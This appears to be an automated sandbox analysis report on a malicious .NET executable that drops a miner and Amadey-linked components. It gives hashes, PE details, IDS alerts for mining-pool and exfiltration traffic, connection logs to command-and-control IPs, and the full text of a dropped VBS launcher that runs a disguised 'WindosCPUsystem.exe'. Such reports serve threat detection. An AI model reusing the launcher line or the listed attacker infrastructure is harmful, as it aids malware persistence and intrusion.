                                                                                  • 154.216.18.216
                                                                                  mips.elfGet hashmaliciousMiraiBrowse
                                                                                  • 156.226.9.180
                                                                                  https://u48551708.ct.sendgrid.net/ls/click?upn=u001.ztPEaTmy8WofhPYJ48HDSCunUq5pm5yTGRhe-2B0bVSngC8hMYiy6PgMy1xJOG8JJZaOsK-2FG9SE7UmhEzeQSXDmEf7Z3nlXZDH-2BW1HSMP6c8uYUvXDTaJRyLbPDV6bI3nnDyIlM0OJKevMwAF04rpfLmQEYS641NQTMU227kkOtBQgQK-2FNlHeN6DpPMLDgH6kuMS3X_2vbC1nrAFjePip8HYuHYOlkYXiy7Z-2FrO9MQN7lNoEgxRkovUJGAEvKvTFyRmFsa9AQlcDpFhpJzgHajMOC0yWTZOc2DdmxhrlyPvteyXbl8nlhAtf2p-2FHw4RnlZ8cxDY-2BWJeBsszGnsrXuNOI8LpL5ZYI3ad04OdxC8tHHA5tO-2Be1xS3Z9Z3VrOTM-2FT5ptoYnx5N-2FTYKQ13RZ-2FookVMhAtJ6OV43Zayd1qOmHGLwUI8-3DGet hashmaliciousPhisherBrowse
                                                                                  • 154.216.20.188
                                                                                  Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 154.216.18.62
                                                                                  RH74mYjwoQ.elfGet hashmaliciousMiraiBrowse
                                                                                  • 154.216.16.109
                                                                                  tgCdafZIfZ.elfGet hashmaliciousMiraiBrowse
                                                                                  • 154.216.16.109
                                                                                  LiUgL2AoGI.elfGet hashmaliciousMiraiBrowse
                                                                                  • 154.216.16.109
                                                                                  hax.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                  • 156.230.19.183
                                                                                  16RIueF7yh.elfGet hashmaliciousMiraiBrowse
                                                                                  • 154.216.16.109
                                                                                  DAPLDATAPLANETLtdRUhttp://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.comGet hashmaliciousUnknownBrowse
                                                                                  • 93.188.41.36
                                                                                  file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                  • 37.203.243.102
                                                                                  file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                  • 37.203.243.102
                                                                                  lokigod.exeGet hashmaliciousXmrigBrowse
                                                                                  • 37.203.243.102
                                                                                  xblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                                                                                  • 37.203.243.102
                                                                                  v859oajfVH.elfGet hashmaliciousUnknownBrowse
                                                                                  • 37.203.242.178
                                                                                  oAUrOBvfbV.elfGet hashmaliciousMiraiBrowse
                                                                                  • 93.188.42.246
                                                                                  x86_64-20220704-2102Get hashmaliciousMiraiBrowse
                                                                                  • 93.188.42.210
                                                                                  9faoC0drSoGet hashmaliciousMiraiBrowse
                                                                                  • 93.188.42.249
                                                                                  armGet hashmaliciousMiraiBrowse
                                                                                  • 93.188.42.224
                                                                                  No context
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  C:\Users\user\AppData\Local\Temp\orupcopicsyv.sys5EZLEXDveC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                    6R0yrvM8Hk.exeGet hashmaliciousXmrigBrowse
                                                                                      file.exeGet hashmaliciousXmrigBrowse
                                                                                        Step 3 - Setup_Install.exeGet hashmaliciousXmrigBrowse
                                                                                          Step 3 - Setup_Install.exeGet hashmaliciousXmrigBrowse
                                                                                            file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                              IYXE4Uz61k.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                                  file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                                    nlGOh9K5X5.exeGet hashmaliciousXmrigBrowse
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):64
                                                                                                      Entropy (8bit):1.1510207563435464
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                                      MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                                      SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                                      SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                                      SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:@...e................................................@..........
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):14544
                                                                                                      Entropy (8bit):6.2660301556221185
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: 5EZLEXDveC.exe, Detection: malicious, Browse
                                                                                                      • Filename: 6R0yrvM8Hk.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: Step 3 - Setup_Install.exe, Detection: malicious, Browse
                                                                                                      • Filename: Step 3 - Setup_Install.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: IYXE4Uz61k.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      • Filename: nlGOh9K5X5.exe, Detection: malicious, Browse
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):91
                                                                                                      Entropy (8bit):4.8416088276406555
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:FER/n0eFHHoUkh4EaKC59KMWRAI0Enn:FER/lFHI9aZ5bHnEn
                                                                                                      MD5:2623A9CF3392E6ACCBC4CDDB6850ED99
                                                                                                      SHA1:ED30600FFC04D8D17FFB03E2EDA871AD33B95DD7
                                                                                                      SHA-256:236D18CD26DF49DDE5A64EDB62EB7A8DB149DC3ECEB7661B2C10D99BFE15DC9A
                                                                                                      SHA-512:65FA8B66379574315C0445ADD4734437C2247188342437D4159EE3EF39F28ED717AB199A15DD038C45D6CC610F137E1473F18C3575AD3DF02F13BFD6A2D318C2
                                                                                                      Malicious:true
                                                                                                      Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\WindosCPUsystem.exe"""
                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                      File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5876736
                                                                                                      Entropy (8bit):7.987361799164257
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:IF8Jy4t4FcDjggommtmnxa2rfmHV0Vzd/MQdpPPz/8ionsZk/6T0UT6dSG:G8JcFcAxkx1rfyV6nLPPwNsZe6vG
                                                                                                      MD5:53E3F2BACA38239BD6025B9E18E5F202
                                                                                                      SHA1:C8D0D5D1FCCE95E253AD60D639F418AB3D98F094
                                                                                                      SHA-256:012789B93B6D8186346FD774B7E428A8982C409B59FA845BA196AE89AC6706CB
                                                                                                      SHA-512:0B5132E9C127C428AC6109F45834F62B5F38EFE6D36011E5FC2D6B5557DE5E41DA7A5000269D290262368CF9DA1FDFE784B830A211B7B4A680BAD455DDD86420
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 24%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....Z[g..........".......Y.............. ....@...... ........................Z...........`...@......@............... ................................Y.............................................................................................. ..H............text.....Y.. ....Y................. ..`.rsrc.........Y.......Y.............@..@........................................H...........@Y..........DC..H.V..........................................(....(}...*..(j...*.~....-.r...p.....+.+.+......~....*(k...+.ol...+.sm...+..~....*..+......*.+..+.r9..p~....+.t....*(....+.on...+...+.{....*.+.B+.+.}....*.+..+......(j...*~ .....i...%.x...+......*(o...+.:.(p.....}....*..+.{....*.+.V..}.....(j.....}....*...+.{....*.+.B+.+.}....*.+..+.....+.{....*.+..+.{....*.+..+.{....*.+..+.{....*.+.B+.+.}....*.+..+.....0..l.......+G{....-#+A+B{....{....+9{....+5{....+1}.....-.+
                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                      Malicious:true
                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                      File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.987361799164257
                                                                                                      TrID:
                                                                                                      • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                                      • Win64 Executable GUI (202006/5) 46.43%
                                                                                                      • Win64 Executable (generic) (12005/4) 2.76%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                                      • DOS Executable Generic (2002/1) 0.46%
                                                                                                      File name:file.exe
                                                                                                      File size:5'876'736 bytes
                                                                                                      MD5:53e3f2baca38239bd6025b9e18e5f202
                                                                                                      SHA1:c8d0d5d1fcce95e253ad60d639f418ab3d98f094
                                                                                                      SHA256:012789b93b6d8186346fd774b7e428a8982c409b59fa845ba196ae89ac6706cb
                                                                                                      SHA512:0b5132e9c127c428ac6109f45834f62b5f38efe6d36011e5fc2d6b5557de5e41da7a5000269d290262368cf9da1fdfe784b830a211b7b4a680bad455ddd86420
                                                                                                      SSDEEP:98304:IF8Jy4t4FcDjggommtmnxa2rfmHV0Vzd/MQdpPPz/8ionsZk/6T0UT6dSG:G8JcFcAxkx1rfyV6nLPPwNsZe6vG
                                                                                                      TLSH:0346334D339A2AA0F2E563BE94E171440735F992D28AD7662AA024F64C3F3564DC3F27
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....Z[g..........".......Y.............. ....@...... ........................Z...........`...@......@............... .....
                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                      Entrypoint:0x400000
                                                                                                      Entrypoint Section:
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x675B5A17 [Thu Dec 12 21:48:07 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:
                                                                                                      Instruction
                                                                                                      dec ebp
                                                                                                      pop edx
                                                                                                      nop
                                                                                                      add byte ptr [ebx], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax+eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x59e0000x58e.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x20000x59a28c0x59a400712320b9c8216a1e95d606fa09f7d03cunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x59e0000x58e0x600317d4042848e9220345c8815028751c7False0.41796875data4.073569947069976IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_VERSION0x59e05c0x30cdata0.4230769230769231
                                                                                                      RT_MANIFEST0x59e3a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-12-12T20:36:19.985337+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.5640471.1.1.153UDP
                                                                                                      2024-12-12T20:36:23.813794+01002054247ET MALWARE SilentCryptoMiner Agent Config Inbound1154.216.20.243443192.168.2.549705TCP
                                                                                                      2024-12-12T20:36:26.424321+01002044697ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M31192.168.2.549707154.216.20.243443TCP
                                                                                                      2024-12-12T20:37:23.355991+01002044697ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M31192.168.2.549835154.216.20.243443TCP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 12, 2024 20:36:20.245138884 CET497043333192.168.2.537.203.243.102
                                                                                                      Dec 12, 2024 20:36:20.365001917 CET33334970437.203.243.102192.168.2.5
                                                                                                      Dec 12, 2024 20:36:20.366039991 CET497043333192.168.2.537.203.243.102
                                                                                                      Dec 12, 2024 20:36:20.369039059 CET497043333192.168.2.537.203.243.102
                                                                                                      Dec 12, 2024 20:36:20.490075111 CET33334970437.203.243.102192.168.2.5
                                                                                                      Dec 12, 2024 20:36:21.698484898 CET33334970437.203.243.102192.168.2.5
                                                                                                      Dec 12, 2024 20:36:21.698689938 CET33334970437.203.243.102192.168.2.5
                                                                                                      Dec 12, 2024 20:36:21.698750019 CET497043333192.168.2.537.203.243.102
                                                                                                      Dec 12, 2024 20:36:21.822045088 CET49705443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:21.822093010 CET44349705154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:21.822149038 CET49705443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:21.834323883 CET49705443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:21.834343910 CET44349705154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:23.278712988 CET44349705154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:23.279824018 CET49705443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:23.279851913 CET44349705154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:23.281891108 CET44349705154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:23.281964064 CET49705443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:23.284075022 CET49705443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:23.284169912 CET44349705154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:23.284245014 CET49705443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:23.284252882 CET44349705154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:23.330208063 CET49705443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:23.813343048 CET44349705154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:23.813534975 CET44349705154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:23.813838005 CET49705443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:23.814999104 CET49705443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:23.815017939 CET44349705154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:23.847588062 CET497043333192.168.2.537.203.243.102
                                                                                                      Dec 12, 2024 20:36:23.847588062 CET497043333192.168.2.537.203.243.102
                                                                                                      Dec 12, 2024 20:36:24.436491966 CET49707443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:24.436534882 CET44349707154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:24.436656952 CET49707443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:24.445790052 CET49707443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:24.445802927 CET44349707154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:25.877960920 CET44349707154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:25.881087065 CET49707443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:25.881113052 CET44349707154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:25.883156061 CET44349707154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:25.883228064 CET49707443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:25.885232925 CET49707443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:25.885324955 CET44349707154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:25.885521889 CET49707443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:25.885530949 CET44349707154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:25.939697027 CET49707443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:26.424405098 CET44349707154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:26.424562931 CET44349707154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:26.428697109 CET49707443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:26.439775944 CET49707443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:36:26.439804077 CET44349707154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:36:27.229688883 CET497134444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:36:27.356483936 CET444449713192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:36:27.356563091 CET497134444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:36:27.356874943 CET497134444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:36:27.477278948 CET444449713192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:36:48.050609112 CET497134444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:36:48.211554050 CET444449713192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:36:49.287113905 CET444449713192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:36:49.287247896 CET497134444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:36:53.534205914 CET497724444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:36:53.654125929 CET444449772192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:36:53.654217958 CET497724444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:36:53.654488087 CET497724444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:36:53.774846077 CET444449772192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:37:14.143059015 CET497724444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:37:14.311340094 CET444449772192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:37:15.553539038 CET444449772192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:37:15.553653002 CET497724444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:37:19.224462032 CET498304444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:37:19.350164890 CET444449830192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:37:19.350385904 CET498304444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:37:19.350559950 CET498304444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:37:19.474194050 CET444449830192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:37:21.273200989 CET49835443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:37:21.273232937 CET44349835154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:37:21.273303032 CET49835443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:37:21.292215109 CET49835443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:37:21.292227983 CET44349835154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:37:22.793664932 CET44349835154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:37:22.795440912 CET49835443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:37:22.795469999 CET44349835154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:37:22.799036026 CET44349835154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:37:22.799149990 CET49835443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:37:22.801765919 CET49835443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:37:22.802009106 CET44349835154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:37:22.802129030 CET49835443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:37:22.802135944 CET44349835154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:37:22.845966101 CET49835443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:37:23.355900049 CET44349835154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:37:23.356072903 CET44349835154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:37:23.356156111 CET49835443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:37:23.362062931 CET49835443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:37:23.362062931 CET49835443192.168.2.5154.216.20.243
                                                                                                      Dec 12, 2024 20:37:23.362087011 CET44349835154.216.20.243192.168.2.5
                                                                                                      Dec 12, 2024 20:37:39.752455950 CET498304444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:37:39.915656090 CET444449830192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:37:41.319206953 CET444449830192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:37:41.321799040 CET498304444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:37:44.955976963 CET498894444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:37:45.076216936 CET444449889192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:37:45.076329947 CET498894444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:37:45.076581001 CET498894444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:37:45.196553946 CET444449889192.168.0.100192.168.2.5
